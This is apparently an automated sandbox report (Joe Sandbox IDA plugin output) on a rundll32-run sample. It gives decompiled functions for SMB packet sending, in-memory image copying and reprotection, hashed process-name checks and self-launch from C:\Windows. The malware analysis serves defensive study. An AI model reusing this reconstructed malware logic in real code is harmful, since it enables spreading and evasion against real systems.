                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wsprintf$FileFindNamePath
                                                                                                                                                              • String ID: \"C:\Windows\%s\" #1
                                                                                                                                                              • API String ID: 988121887-1875761687
                                                                                                                                                              • Opcode ID: 31b731357a6b5bf6b3972c0b2b472e30493e3311f7d38d95fc373db7dcbf9b85
                                                                                                                                                              • Instruction ID: db43fae4e3dff2dc29ff074459440158f83815890fdc46ed3bef11965c6f4df5
                                                                                                                                                              • Opcode Fuzzy Hash: 31b731357a6b5bf6b3972c0b2b472e30493e3311f7d38d95fc373db7dcbf9b85
                                                                                                                                                              • Instruction Fuzzy Hash: 06517123A24358A5DB20DFD4EC05BEFB774FF447A1F10606AE604AB2A0E2B15940C79A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E04E26F7C(void* __ecx, intOrPtr _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				_Unknown_base(*)()* _t7;
                                                                                                                                                              
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                              					 *_t7(_a4,  &_v8);
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}





                                                                                                                                                              0x04e26f80
                                                                                                                                                              0x04e26f95
                                                                                                                                                              0x04e26f9d
                                                                                                                                                              0x04e26fa6
                                                                                                                                                              0x04e26fa6
                                                                                                                                                              0x04e26fac

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04E27170,00000000,?,04E27AF8), ref: 04E26F8E
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04E26F95
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                              • API String ID: 1646373207-3024904723
                                                                                                                                                              • Opcode ID: 7d903abf7aecc0d005a76e153d102b9bb54c3d45a486efeaa82d1d96b29b781e
                                                                                                                                                              • Instruction ID: 86b7ab90d22a66cec81879a146feb48029c7c6d6c67ec87cbcf91e5f7cf670d3
                                                                                                                                                              • Opcode Fuzzy Hash: 7d903abf7aecc0d005a76e153d102b9bb54c3d45a486efeaa82d1d96b29b781e
                                                                                                                                                              • Instruction Fuzzy Hash: 1ED0127160020DBBDB24DBA5DE0AE9DB768EB1474BF105118B506E1040D7B9EF01DB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E04E2923F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              				long _t35;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                              				int _t44;
                                                                                                                                                              				void* _t47;
                                                                                                                                                              				long _t48;
                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				if( *0x4e37b8c != 0) {
                                                                                                                                                              					L15:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t52 =  *0x4e33984; // 0x11c5380
                                                                                                                                                              				if(_t52 == 0) {
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              				_t14 =  *0x4e37b98;
                                                                                                                                                              				_t44 =  *( *((intOrPtr*)(_t14 + 0x3c)) + _t14 + 0x50);
                                                                                                                                                              				_t40 = _t14;
                                                                                                                                                              				_v8 = _t44;
                                                                                                                                                              				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
                                                                                                                                                              				if(_t31 == 0) {
                                                                                                                                                              					L14:
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              				 *0x4e37bb4 = _t31;
                                                                                                                                                              				memcpy(_t31, _t40, _t44);
                                                                                                                                                              				_t42 =  *0x4e33984; // 0x11c5380
                                                                                                                                                              				_t47 =  *((intOrPtr*)(_t42 + 0x3c)) + _t42;
                                                                                                                                                              				if(_t47 != 0) {
                                                                                                                                                              					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
                                                                                                                                                              					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
                                                                                                                                                              						_t22 = E04E28FD1(_t47, _t21);
                                                                                                                                                              						_t23 = _t22 + _t42;
                                                                                                                                                              						if(_t22 + _t42 != 0 && E04E28EA9(_t23, _t31) != 0 && E04E28F35(_t47, _t31) != 0) {
                                                                                                                                                              							_push(0xffffffff);
                                                                                                                                                              							_push(_a12);
                                                                                                                                                              							_push(_a8);
                                                                                                                                                              							_push(_a4);
                                                                                                                                                              							 *((intOrPtr*)(E04E29154 -  *0x4e37b98 + _t31))();
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t48 = _v8;
                                                                                                                                                              				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
                                                                                                                                                              					goto L14;
                                                                                                                                                              				}
                                                                                                                                                              				_t35 = _t48;
                                                                                                                                                              				_t19 = _t31;
                                                                                                                                                              				if(_t48 == 0) {
                                                                                                                                                              					L13:
                                                                                                                                                              					VirtualFree(_t31, _t48, 0x4000);
                                                                                                                                                              					goto L14;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L12;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					L12:
                                                                                                                                                              					 *_t19 = 0;
                                                                                                                                                              					_t19 = _t19 + 1;
                                                                                                                                                              					_t35 = _t35 - 1;
                                                                                                                                                              				} while (_t35 != 0);
                                                                                                                                                              				goto L13;
                                                                                                                                                              			}

















                                                                                                                                                              0x04e29242
                                                                                                                                                              0x04e29243
                                                                                                                                                              0x04e2924c
                                                                                                                                                              0x04e2932c
                                                                                                                                                              0x04e2932f
                                                                                                                                                              0x04e2932f
                                                                                                                                                              0x04e29252
                                                                                                                                                              0x04e29258
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2925e
                                                                                                                                                              0x04e29268
                                                                                                                                                              0x04e29276
                                                                                                                                                              0x04e29278
                                                                                                                                                              0x04e29281
                                                                                                                                                              0x04e29285
                                                                                                                                                              0x04e29329
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2932b
                                                                                                                                                              0x04e2928e
                                                                                                                                                              0x04e29294
                                                                                                                                                              0x04e29299
                                                                                                                                                              0x04e292a5
                                                                                                                                                              0x04e292a7
                                                                                                                                                              0x04e292a9
                                                                                                                                                              0x04e292b1
                                                                                                                                                              0x04e292bf
                                                                                                                                                              0x04e292c4
                                                                                                                                                              0x04e292c6
                                                                                                                                                              0x04e292de
                                                                                                                                                              0x04e292e0
                                                                                                                                                              0x04e292e8
                                                                                                                                                              0x04e292f1
                                                                                                                                                              0x04e292f6
                                                                                                                                                              0x04e292f6
                                                                                                                                                              0x04e292c6
                                                                                                                                                              0x04e292b1
                                                                                                                                                              0x04e292f8
                                                                                                                                                              0x04e2930b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2930d
                                                                                                                                                              0x04e2930f
                                                                                                                                                              0x04e29313
                                                                                                                                                              0x04e2931c
                                                                                                                                                              0x04e29323
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29315
                                                                                                                                                              0x04e29315
                                                                                                                                                              0x04e29315
                                                                                                                                                              0x04e29318
                                                                                                                                                              0x04e29319
                                                                                                                                                              0x04e29319
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04E279FC,?,?,?), ref: 04E2927B
                                                                                                                                                              • memcpy.MSVCRT ref: 04E29294
                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04E29303
                                                                                                                                                              • VirtualFree.KERNEL32(00000000,?,00004000), ref: 04E29323
                                                                                                                                                                • Part of subcall function 04E28F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04E28F52
                                                                                                                                                                • Part of subcall function 04E28F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,011C5380), ref: 04E28FB0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Virtual$Protect$AllocFreememcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2644210-0
                                                                                                                                                              • Opcode ID: 82541160b0a431f8be74176da88fdd189f7dc9820de721f6b7aaa26d76663c0e
                                                                                                                                                              • Instruction ID: cf632403cee53d8b8c1861547463825cfff5d87e451cac0a32f4a157765b9d21
                                                                                                                                                              • Opcode Fuzzy Hash: 82541160b0a431f8be74176da88fdd189f7dc9820de721f6b7aaa26d76663c0e
                                                                                                                                                              • Instruction Fuzzy Hash: C8210EF2700225ABEB215F699E44FAB77A9FB4531AF183158B515E3286D634FC00C750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2BECB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                              				int _t39;
                                                                                                                                                              				int _t41;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                              				int _t53;
                                                                                                                                                              				int _t54;
                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                              				int _t60;
                                                                                                                                                              				int _t62;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              
                                                                                                                                                              				_t57 = _a4;
                                                                                                                                                              				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
                                                                                                                                                              				if( *(_t64 + 0x34) != 0) {
                                                                                                                                                              					L3:
                                                                                                                                                              					if( *(_t64 + 0x28) == 0) {
                                                                                                                                                              						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
                                                                                                                                                              						 *(_t64 + 0x30) = 0;
                                                                                                                                                              						 *(_t64 + 0x2c) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t60 =  *(_t64 + 0x28);
                                                                                                                                                              					_t52 = _a12;
                                                                                                                                                              					_t34 = _a8;
                                                                                                                                                              					if(_t52 < _t60) {
                                                                                                                                                              						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
                                                                                                                                                              						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
                                                                                                                                                              						_t53 = _t52 - _t62;
                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                              							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
                                                                                                                                                              							_t54 =  *(_t64 + 0x28);
                                                                                                                                                              							if( *(_t64 + 0x30) == _t54) {
                                                                                                                                                              								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                              							}
                                                                                                                                                              							_t39 =  *(_t64 + 0x2c);
                                                                                                                                                              							if(_t39 >= _t54) {
                                                                                                                                                              								goto L15;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t41 = _t39 + _t62;
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
                                                                                                                                                              						 *(_t64 + 0x30) = _t53;
                                                                                                                                                              						goto L7;
                                                                                                                                                              					} else {
                                                                                                                                                              						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
                                                                                                                                                              						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                              						L7:
                                                                                                                                                              						_t41 =  *(_t64 + 0x28);
                                                                                                                                                              						L14:
                                                                                                                                                              						 *(_t64 + 0x2c) = _t41;
                                                                                                                                                              						L15:
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
                                                                                                                                                              				_t65 = _t65 + 0xc;
                                                                                                                                                              				 *(_t64 + 0x34) = 1;
                                                                                                                                                              				if(_t49 != 0) {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				return 1;
                                                                                                                                                              			}















                                                                                                                                                              0x04e2bece
                                                                                                                                                              0x04e2bed4
                                                                                                                                                              0x04e2bedf
                                                                                                                                                              0x04e2bf01
                                                                                                                                                              0x04e2bf04
                                                                                                                                                              0x04e2bf0b
                                                                                                                                                              0x04e2bf0e
                                                                                                                                                              0x04e2bf11
                                                                                                                                                              0x04e2bf11
                                                                                                                                                              0x04e2bf14
                                                                                                                                                              0x04e2bf17
                                                                                                                                                              0x04e2bf1a
                                                                                                                                                              0x04e2bf1f
                                                                                                                                                              0x04e2bf3e
                                                                                                                                                              0x04e2bf4c
                                                                                                                                                              0x04e2bf54
                                                                                                                                                              0x04e2bf56
                                                                                                                                                              0x04e2bf6f
                                                                                                                                                              0x04e2bf72
                                                                                                                                                              0x04e2bf78
                                                                                                                                                              0x04e2bf7a
                                                                                                                                                              0x04e2bf7a
                                                                                                                                                              0x04e2bf7e
                                                                                                                                                              0x04e2bf83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2bf85
                                                                                                                                                              0x04e2bf85
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2bf85
                                                                                                                                                              0x04e2bf83
                                                                                                                                                              0x04e2bf62
                                                                                                                                                              0x04e2bf6a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2bf21
                                                                                                                                                              0x04e2bf28
                                                                                                                                                              0x04e2bf30
                                                                                                                                                              0x04e2bf34
                                                                                                                                                              0x04e2bf34
                                                                                                                                                              0x04e2bf87
                                                                                                                                                              0x04e2bf87
                                                                                                                                                              0x04e2bf8a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2bf8a
                                                                                                                                                              0x04e2bf1f
                                                                                                                                                              0x04e2beed
                                                                                                                                                              0x04e2bef0
                                                                                                                                                              0x04e2bef3
                                                                                                                                                              0x04e2bef8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: Oet
                                                                                                                                                              • API String ID: 3510742995-3042086936
                                                                                                                                                              • Opcode ID: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
                                                                                                                                                              • Instruction ID: 584679659242e31e301897e3989064ed43b52d5d636e66c23ac1f56ad2f13591
                                                                                                                                                              • Opcode Fuzzy Hash: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
                                                                                                                                                              • Instruction Fuzzy Hash: BB213272A10B159FE7608F29CE84917B7E9FF987187446A2DE98687E10D331F844CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2501E(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, char _a20, void** _a24) {
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              
                                                                                                                                                              				_t29 = __ecx;
                                                                                                                                                              				_t28 = 0;
                                                                                                                                                              				if(E04E22F5A(_a4, _a8, _a12, 0, 0xff, 8, _a16, _a20) != 0) {
                                                                                                                                                              					_a20 = 0;
                                                                                                                                                              					_a16 = 0;
                                                                                                                                                              					if(E04E23071(_t29, _a4, _a8, _a12,  &_a16,  &_a20) != 0) {
                                                                                                                                                              						_t25 = _a16;
                                                                                                                                                              						if(_a20 == 0x74 &&  *((intOrPtr*)(_t25 + 0x50)) == 0x1c &&  *((intOrPtr*)(_t25 + 0x70)) == 0) {
                                                                                                                                                              							_t30 = 5;
                                                                                                                                                              							_t25 = memcpy( *_a24, _t25 + 0x5c, _t30 << 2);
                                                                                                                                                              							_t28 = 1;
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t25);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t28;
                                                                                                                                                              			}







                                                                                                                                                              0x04e2501e
                                                                                                                                                              0x04e25025
                                                                                                                                                              0x04e25042
                                                                                                                                                              0x04e2504f
                                                                                                                                                              0x04e25055
                                                                                                                                                              0x04e25062
                                                                                                                                                              0x04e25068
                                                                                                                                                              0x04e2506b
                                                                                                                                                              0x04e25081
                                                                                                                                                              0x04e25085
                                                                                                                                                              0x04e25088
                                                                                                                                                              0x04e2508a
                                                                                                                                                              0x04e25095
                                                                                                                                                              0x04e25095
                                                                                                                                                              0x04e25062
                                                                                                                                                              0x04e2509f

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E22F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04E22F73
                                                                                                                                                                • Part of subcall function 04E22F5A: HeapAlloc.KERNEL32(00000000), ref: 04E22F7C
                                                                                                                                                                • Part of subcall function 04E22F5A: GetProcessHeap.KERNEL32(00000008,?,7777C2E0), ref: 04E22F97
                                                                                                                                                                • Part of subcall function 04E22F5A: HeapAlloc.KERNEL32(00000000), ref: 04E22F9A
                                                                                                                                                                • Part of subcall function 04E22F5A: htons.WS2_32(424D53FE), ref: 04E22FBA
                                                                                                                                                                • Part of subcall function 04E22F5A: memcpy.MSVCRT ref: 04E2300B
                                                                                                                                                                • Part of subcall function 04E22F5A: send.WS2_32(?,00000000,?,00000000), ref: 04E2301B
                                                                                                                                                                • Part of subcall function 04E22F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E23032
                                                                                                                                                                • Part of subcall function 04E22F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E23048
                                                                                                                                                                • Part of subcall function 04E22F5A: HeapFree.KERNEL32(00000000), ref: 04E2304F
                                                                                                                                                                • Part of subcall function 04E22F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 04E2305A
                                                                                                                                                                • Part of subcall function 04E22F5A: HeapFree.KERNEL32(00000000), ref: 04E23061
                                                                                                                                                                • Part of subcall function 04E23071: GetProcessHeap.KERNEL32(00000008,0000FFFF,74654F20,00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04E23089
                                                                                                                                                                • Part of subcall function 04E23071: HeapAlloc.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23092
                                                                                                                                                                • Part of subcall function 04E23071: GetProcessHeap.KERNEL32(00000008,0000003F,74655520,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E230A4
                                                                                                                                                                • Part of subcall function 04E23071: HeapAlloc.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E230A7
                                                                                                                                                                • Part of subcall function 04E23071: htons.WS2_32(0000003B), ref: 04E230BF
                                                                                                                                                                • Part of subcall function 04E23071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 04E230F7
                                                                                                                                                                • Part of subcall function 04E23071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 04E2310D
                                                                                                                                                                • Part of subcall function 04E23071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23127
                                                                                                                                                                • Part of subcall function 04E23071: HeapAlloc.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E2312E
                                                                                                                                                                • Part of subcall function 04E23071: memcpy.MSVCRT ref: 04E23144
                                                                                                                                                                • Part of subcall function 04E23071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23153
                                                                                                                                                                • Part of subcall function 04E23071: HeapFree.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E2315A
                                                                                                                                                                • Part of subcall function 04E23071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E23165
                                                                                                                                                                • Part of subcall function 04E23071: HeapFree.KERNEL32(00000000,?,?,?,04E24F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E2316C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,000000FF,00000008,?,00000000,00000000), ref: 04E2508E
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,04E252E8,?,?,?,00000000), ref: 04E25095
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet$t
                                                                                                                                                              • API String ID: 2433318192-2047160959
                                                                                                                                                              • Opcode ID: e9f287233284a1186d8675c9a41485d270d52c255a6c68c682c630577faacf46
                                                                                                                                                              • Instruction ID: 833ac0cc6264424c919d64d5cb9e0c830acb6c6d0952a916a18a8d9f9a384f80
                                                                                                                                                              • Opcode Fuzzy Hash: e9f287233284a1186d8675c9a41485d270d52c255a6c68c682c630577faacf46
                                                                                                                                                              • Instruction Fuzzy Hash: 0411187200021ABFEF119F50DE84DAB7B29FB15394F004026FE005A160C772A966DBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E04E2855F() {
                                                                                                                                                              				char _v524;
                                                                                                                                                              				void* _v560;
                                                                                                                                                              				int _t8;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              				signed int _t13;
                                                                                                                                                              				signed int _t14;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              
                                                                                                                                                              				_t14 = _t13 | 0xffffffff;
                                                                                                                                                              				_t15 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                              				if(_t15 != _t14) {
                                                                                                                                                              					_push( &_v560);
                                                                                                                                                              					_v560 = 0x22c;
                                                                                                                                                              					_t8 = Process32FirstW(_t15);
                                                                                                                                                              					while(_t8 != 0) {
                                                                                                                                                              						_t10 = E04E282EE( &_v524);
                                                                                                                                                              						if(_t10 == 0x4a241c3e) {
                                                                                                                                                              							L10:
                                                                                                                                                              							_t14 = _t14 & 0xffffffef;
                                                                                                                                                              						} else {
                                                                                                                                                              							if(_t10 == 0x923ca517) {
                                                                                                                                                              								L9:
                                                                                                                                                              								_t14 = _t14 & 0xffffffbf;
                                                                                                                                                              							} else {
                                                                                                                                                              								if(_t10 == 0x966d0415 || _t10 == 0xaa331620) {
                                                                                                                                                              									goto L10;
                                                                                                                                                              								} else {
                                                                                                                                                              									if(_t10 == 0xc8f10976) {
                                                                                                                                                              										goto L9;
                                                                                                                                                              									} else {
                                                                                                                                                              										if(_t10 == 0xe2517a14) {
                                                                                                                                                              											goto L10;
                                                                                                                                                              										} else {
                                                                                                                                                              											if(_t10 == 0xe5a05a00) {
                                                                                                                                                              												goto L9;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t8 = Process32NextW(_t15,  &_v560);
                                                                                                                                                              					}
                                                                                                                                                              					CloseHandle(_t15);
                                                                                                                                                              				}
                                                                                                                                                              				return _t14;
                                                                                                                                                              			}










                                                                                                                                                              0x04e2856e
                                                                                                                                                              0x04e28577
                                                                                                                                                              0x04e2857b
                                                                                                                                                              0x04e28583
                                                                                                                                                              0x04e28585
                                                                                                                                                              0x04e2858f
                                                                                                                                                              0x04e285ea
                                                                                                                                                              0x04e2859e
                                                                                                                                                              0x04e285a8
                                                                                                                                                              0x04e285d9
                                                                                                                                                              0x04e285d9
                                                                                                                                                              0x04e285aa
                                                                                                                                                              0x04e285af
                                                                                                                                                              0x04e285d4
                                                                                                                                                              0x04e285d4
                                                                                                                                                              0x04e285b1
                                                                                                                                                              0x04e285b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e285bf
                                                                                                                                                              0x04e285c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e285c6
                                                                                                                                                              0x04e285cb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e285cd
                                                                                                                                                              0x04e285d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e285d2
                                                                                                                                                              0x04e285cb
                                                                                                                                                              0x04e285c4
                                                                                                                                                              0x04e285b6
                                                                                                                                                              0x04e285af
                                                                                                                                                              0x04e285e4
                                                                                                                                                              0x04e285e4
                                                                                                                                                              0x04e285ef
                                                                                                                                                              0x04e285ef
                                                                                                                                                              0x04e285fa

                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04E28571
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04E2858F
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04E285E4
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04E285EF
